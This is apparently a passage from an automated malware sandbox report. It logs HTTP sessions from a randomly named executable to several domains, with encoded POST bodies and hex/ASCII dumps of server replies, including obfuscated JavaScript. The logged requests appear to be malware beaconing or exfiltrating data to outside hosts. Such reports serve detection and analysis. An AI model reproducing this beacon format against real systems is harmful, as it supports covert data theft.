                                                                                                                                                    Data Raw: 50 62 47 3d 47 79 6b 69 79 30 70 75 4b 42 41 64 4c 52 70 50 4e 31 79 44 7a 65 38 73 4f 37 37 61 49 75 66 39 55 73 64 64 50 41 31 57 43 56 63 57 67 65 44 49 43 63 54 71 62 72 4f 72 53 69 38 69 41 4b 36 63 67 38 35 71 6c 54 4c 78 77 51 36 35 44 45 44 61 62 67 65 78 69 7a 2f 31 4d 38 46 37 53 53 68 45 42 59 62 4a 4b 53 46 57 61 2b 4e 30 74 47 61 30 43 68 56 6f 59 6e 6e 53 53 38 76 4a 55 72 7a 71 52 41 51 57 74 6a 61 42 65 6c 7a 54 56 4a 61 49 76 33 6d 49 41 6c 58 71 79 53 6a 36 43 71 71 79 6b 41 65 6f 6d 63 72 35 65 70 4d 42 65 4d 62 5a 30 46 49 69 73 4e 48 68 36 59 33 2b 6d 49 78 77 44 6d 37 72 4e 35 41 66 44 42 6a 77 6d 4a 50 62 75 4a 2b 35 75 64 79 46 7a 49 50 31 46 6f 7a 6e 2f 66 53 36 64 4d 6b 6d 53 42 52 72 67 63 79 6f 4b 38 4e 5a 71 68 64 54 42 41 45 49 63 38 33 6c 7a 55 38 43 37 6f 46 54 4d 50 71 6b 55 64 2f 4e 76 71 36 5a 49 41 52 4f 58 56 42 34 72 6c 4f 6a 4b 6a 54 4e 79 37 76 51 7a 37 6f 76 70 4b 48 50 52 62 58 4a 71 6f 2f 2f 35 79 30 4c 77 35 77 30 6f 45 57 33 71 62 73 70 6d 4c 49 66 75 78 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=Gykiy0puKBAdLRpPN1yDze8sO77aIuf9UsddPA1WCVcWgeDICcTqbrOrSi8iAK6cg85qlTLxwQ65DEDabgexiz/1M8F7SShEBYbJKSFWa+N0tGa0ChVoYnnSS8vJUrzqRAQWtjaBelzTVJaIv3mIAlXqySj6CqqykAeomcr5epMBeMbZ0FIisNHh6Y3+mIxwDm7rN5AfDBjwmJPbuJ+5udyFzIP1Fozn/fS6dMkmSBRrgcyoK8NZqhdTBAEIc83lzU8C7oFTMPqkUd/Nvq6ZIAROXVB4rlOjKjTNy7vQz7ovpKHPRbXJqo//5y0Lw5w0oEW3qbspmLIfuxNtu2sKLQw90v2Up9C50hpRGd3zx0oki5CFrc1HLBXfJGkS9u9yRABxe08GvRBg9qLI28/2djkatxyIqlyGW1VNLtvmGlJU8J6QvEJNZ1AyptfPF/d+UJfRNFBrdIIWP2tSVIwI00SLbIGtOANIqw0XrVF8tnjBmqdtNngh/xmUWmt2drkoWuqWF9UwfFTgP/sqlmRSGyNuv5EQabqBpbN5swW9rf7XBcWsiBjjX7O4HyC2Uxhl9t4SK9ot5BUL9iZ/+yzRL9Kw7ffqaJlyTw8ogzXzfxfhRnPyv82qNEsVzHrdWDXM5mT+0UCL0YbRLkwAyyshSEkl/BuUmun5SsD0KaqkFMJclGXdQre/DGixLpWHMws5sSiHVviOkryttkgdQJIjb+8QuyjV08S2jZsEOnMl6uHhakhbiI/QMhcb6KUJMP7aVVjn09GJBEBeCCFE1LGs7BH09J4+97YNNQzlf2K0+futUHJ3L2bcpTdjLqYDAToj/gG5PU1xLlgr6Z0uIn5C2rbOHzoezRzViMuPOT00uj579Ff6/qAIR9Mv05TV+MbwYI5MEAIa4rcZi2HX5/xZATeXlUxhhhZPekwxoKgremREDOIdYu5gqy1NoCK9a7pud7DAx18SR1z9lM306H5iMz5xxYX3/oMKiD6vavrhYt5VCZEe [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:59:53.101636887 CEST4337OUTData Raw: 44 36 31 73 6e 62 68 36 6e 50 4d 46 2f 6a 43 77 4d 36 64 64 78 68 6b 2f 64 54 6e 63 58 4e 7a 35 74 7a 67 4d 58 67 73 57 56 30 78 6b 52 57 48 59 77 71 64 31 44 53 51 2f 78 75 58 6c 54 54 62 38 79 49 6e 6b 48 70 46 70 35 46 64 35 38 57 4b 32 44 77
                                                                                                                                                    Data Ascii: D61snbh6nPMF/jCwM6ddxhk/dTncXNz5tzgMXgsWV0xkRWHYwqd1DSQ/xuXlTTb8yInkHpFp5Fd58WK2DwodngTkkXgE3k3RhPt067bkbMvScsKsEEylIQ7UFNe3ETcC1jW+9k6R6ErS81PTiemT0ozfjj5JdKpw2o9+c0aQC7Ac6BwlFvhUC3BU49a+3VPLgS6s/jR3CGJGkCClNUrYzLsIwFIZhWunI6V9SjqyQB1yid6vuYv
                                                                                                                                                    Oct 4, 2024 11:59:53.725749016 CEST1227INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:53 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 795
                                                                                                                                                    Connection: close
                                                                                                                                                    location: https://www.taketechai.com/6s2u/
                                                                                                                                                    platform: hostinger
                                                                                                                                                    panel: hpanel
                                                                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 9efc779bb12926fc053d02d9b4856da9-bos-edge1
                                                                                                                                                    x-hcdn-cache-status: DYNAMIC
                                                                                                                                                    x-hcdn-upstream-rt: 0.524
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    28192.168.11.2049760191.101.104.164801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:55.726031065 CEST428OUTGET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.taketechai.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:59:55.826356888 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: hcdn
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:55 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 4792
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    x-hcdn-request-id: 858c6aaf115336dd4d2eb4e067ddbddb-bos-edge1
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e 67 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 61 63 63 65 73 73 69 6e 67 2e 20 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 30 22 3e 3c 73 74 79 6c 65 3e 64 69 76 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6c 6f 61 64 65 72 7b 6d 61 72 67 69 6e 3a 61 75 74 6f [TRUNCATED]
                                                                                                                                                    Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
                                                                                                                                                    Oct 4, 2024 11:59:55.826466084 CEST1289INData Raw: 23 30 30 30 30 20 31 30 25 2c 23 30 30 30 29 2c 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 23 30 30 30 20 30 20 30 29 20 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 3a 76 61 72 28 2d 2d 5f 6d 29 3b 6d 61 73 6b 3a
                                                                                                                                                    Data Ascii: #0000 10%,#000),linear-gradient(#000 0 0) content-box;-webkit-mask:var(--_m);mask:var(--_m);-webkit-mask-composite:source-out;mask-composite:subtract;animation:l3 1s infinite linear}@keyframes l3{to{transform:rotate(1turn)}}</style></head><bod
                                                                                                                                                    Oct 4, 2024 11:59:55.826479912 CEST1289INData Raw: 6e 63 61 74 27 2c 27 74 72 61 63 65 27 2c 27 7b 7d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 5c 78 32 32 72 65 74 75 72 6e 5c 78 32 30 74 68 69 73 5c 78 32 32 29 28 5c 78 32 30 29 27 2c 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2c 27 77 61 72 6e 27
                                                                                                                                                    Data Ascii: ncat','trace','{}.constructor(\x22return\x20this\x22)(\x20)','Content-Type','warn','1184299iAoMQM','send','info','apply','application/x-www-form-urlencoded','6689656NjkqqV','28DGQdGS','search','toString','9RrPAbC','(((.+)+)+)+$','__proto__','5
                                                                                                                                                    Oct 4, 2024 11:59:55.826589108 CEST1289INData Raw: 6c 2b 2b 29 7b 76 61 72 20 6d 3d 63 5b 61 33 28 30 78 65 34 2c 30 78 65 65 29 5d 5b 61 33 28 30 78 63 62 2c 30 78 64 31 29 5d 5b 61 33 28 30 78 63 38 2c 30 78 62 66 29 5d 28 63 29 2c 6e 3d 6b 5b 6c 5d 2c 6f 3d 6a 5b 6e 5d 7c 7c 6d 3b 6d 5b 61 33
                                                                                                                                                    Data Ascii: l++){var m=c[a3(0xe4,0xee)][a3(0xcb,0xd1)][a3(0xc8,0xbf)](c),n=k[l],o=j[n]||m;m[a3(0xdf,0xd8)]=c[a3(0xc8,0xba)](c),m[a3(0xdc,0xca)]=o['toString'][a3(0xc8,0xc2)](o),j[n]=m;}});b();var bbc6cf0=function a(z){function A(X,Y){return X>>>Y|X<<0x20-Y
                                                                                                                                                    Oct 4, 2024 11:59:55.826600075 CEST491INData Raw: 34 65 35 64 28 68 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 69 3d 3e 73 65 74 54 69 6d 65 6f 75 74 28 69 2c 68 29 29 3b 7d 28 28 61 73 79 6e 63 28 29 3d 3e 7b 61 77 61 69 74 20 66 32 38 62 34 65 35 64 28 30 78 62 62 38 29 3b
                                                                                                                                                    Data Ascii: 4e5d(h){return new Promise(i=>setTimeout(i,h));}((async()=>{await f28b4e5d(0xbb8);function a5(h,i){return g(i- -0x18d,h);}const h=await bbc6cf0(cjs);xhr=new XMLHttpRequest(),xhr['open'](a5(-0x8c,-0x9d),jsChallengeUrl),xhr[a5(-0xb8,-0xc2)](a5(-


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    29192.168.11.2049761162.255.119.150801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:01.092529058 CEST702OUTPOST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4c 6c 65 5a 52 41 59 75 76 64 6f 46 71 5a 68 7a 39 63 6c 2f 55 38 6a 49 4c 4f 53 54 63 34 73 38 39 67 6c 53 52 6c 65 63 38 6f 31 43 77 7a 4d 7a 61 4b 62 41 65 41 74 79 4b 55 47 58 78 62 63 76 69 54 37 43 51 68 33 69 65 32 4f 52 75 58 38 61 66 37 35 6f 6f 38 46 68 6f 4d 36 45 6e 53 70 78 31 31 37 58 68 34 46 39 31 6c 46 58 6b 75 2f 63 43 4e 66 64 30 52 74 35 41 70 4c 48 76 38 45 4c 6a 56 52 4e 71 36 6a 6f 4c 4b 2f 4d 61 45 44 6e 58 54 30 6b 65 4f 32 64 66 6f 57 61 4c 56 63 5a 77 67 45 4c 44 71 6a 30 73 38 51 43 6f 45 4b 42 46 63 70 44 31 70 6e 79 45 41 73 4b 36 68 32 41 71 51 3d 3d
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFqZhz9cl/U8jILOSTc4s89glSRlec8o1CwzMzaKbAeAtyKUGXxbcviT7CQh3ie2ORuX8af75oo8FhoM6EnSpx117Xh4F91lFXku/cCNfd0Rt5ApLHv8ELjVRNq6joLK/MaEDnXT0keO2dfoWaLVcZwgELDqj0s8QCoEKBFcpD1pnyEAsK6h2AqQ==
                                                                                                                                                    Oct 4, 2024 12:00:01.206471920 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:01 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    30192.168.11.2049762162.255.119.150801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:03.737837076 CEST722OUTPOST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4c 6c 65 5a 52 41 59 75 76 64 6f 46 6f 36 35 7a 37 37 4a 2f 53 63 6a 4a 56 65 53 54 56 59 73 77 39 67 70 53 52 6b 4b 4d 38 61 52 43 31 6a 38 7a 4c 2f 33 41 5a 41 74 79 43 30 47 59 31 62 63 30 69 54 33 4b 51 67 4c 69 65 31 79 52 75 56 6b 61 63 49 52 72 6f 73 46 6a 67 73 36 47 70 79 70 78 31 31 37 58 68 34 52 62 31 6c 39 58 6b 65 76 63 44 70 72 65 39 78 74 36 48 70 4c 48 6c 63 45 50 6a 56 52 37 71 2b 6a 47 4c 49 33 4d 61 42 2f 6e 47 69 30 72 55 4f 32 54 52 49 58 78 4b 57 6c 4c 35 43 34 74 47 72 66 74 6f 70 56 38 67 79 62 62 59 75 64 6e 32 36 37 41 41 77 56 69 34 6a 33 62 33 64 39 31 67 43 34 2f 42 72 77 51 50 48 4c 49 68 45 6b 4d 59 52 41 3d
                                                                                                                                                    Data Ascii: PbG=LleZRAYuvdoFo65z77J/ScjJVeSTVYsw9gpSRkKM8aRC1j8zL/3AZAtyC0GY1bc0iT3KQgLie1yRuVkacIRrosFjgs6Gpypx117Xh4Rb1l9XkevcDpre9xt6HpLHlcEPjVR7q+jGLI3MaB/nGi0rUO2TRIXxKWlL5C4tGrftopV8gybbYudn267AAwVi4j3b3d91gC4/BrwQPHLIhEkMYRA=
                                                                                                                                                    Oct 4, 2024 12:00:03.851988077 CEST1173INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:00:03 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 976
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Served-By: Namecheap URL Forward
                                                                                                                                                    Server: namecheap-nginx
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 63 6f 6e 74 65 6e 74 2d 74 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4b 45 59 57 4f 52 44 53 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 56 45 52 53 49 4f 4e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    31192.168.11.2049763162.255.119.150801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:00:06.378160000 CEST1289OUTPOST /ko0y/ HTTP/1.1
                                                                                                                                                    Host: www.297tamatest1kb.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.297tamatest1kb.com
                                                                                                                                                    Referer: http://www.297tamatest1kb.com/ko0y/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 4c 6c 65 5a 52 41 59 75 76 64 6f 46 6f 36 35 7a 37 37 4a 2f 53 63 6a 4a 56 65 53 54 56 59 73 77 39 67 70 53 52 6b 4b 4d 38 61 5a 43 31 77 30 7a 61 6f 6a 41 59 41 74 79 49 55 48 66 31 62 64 75 69 54 2f 77 51 67 48 79 65 7a 32 52 76 32 73 61 64 35 52 72 6e 73 46 6a 73 4d 36 46 6e 53 70 65 31 31 72 54 68 34 42 62 31 6c 39 58 6b 59 44 63 46 39 66 65 2f 78 74 35 41 70 4c 62 76 38 45 72 6a 56 35 72 71 2b 6e 34 4b 35 58 4d 55 42 50 6e 45 30 67 72 63 4f 32 52 51 34 58 70 4b 58 59 56 35 43 6b 70 47 6f 44 54 6f 75 68 38 6b 48 65 57 49 39 4e 51 79 39 43 4d 64 43 46 39 37 51 72 7a 30 2f 4e 4f 6b 6a 6b 4a 50 4c 77 77 45 6d 66 61 34 57 59 78 45 6e 35 49 59 69 4f 67 73 76 49 79 44 4a 65 69 4d 32 46 38 54 65 69 30 71 39 53 67 64 69 32 58 6e 66 32 7a 54 6b 4c 56 5a 4f 33 50 41 44 38 63 36 7a 54 74 42 58 36 59 69 59 69 72 70 7a 58 66 77 37 68 58 6b 54 79 39 34 75 56 73 4b 76 72 70 71 59 65 2f 72 4e 55 65 38 4f 2f 64 65 79 69 45 73 72 77 4d 6b 4f 54 33 39 53 32 4b 45 36 4f 49 36 30 49 44 45 50 44 53 68 66 [TRUNCATED]
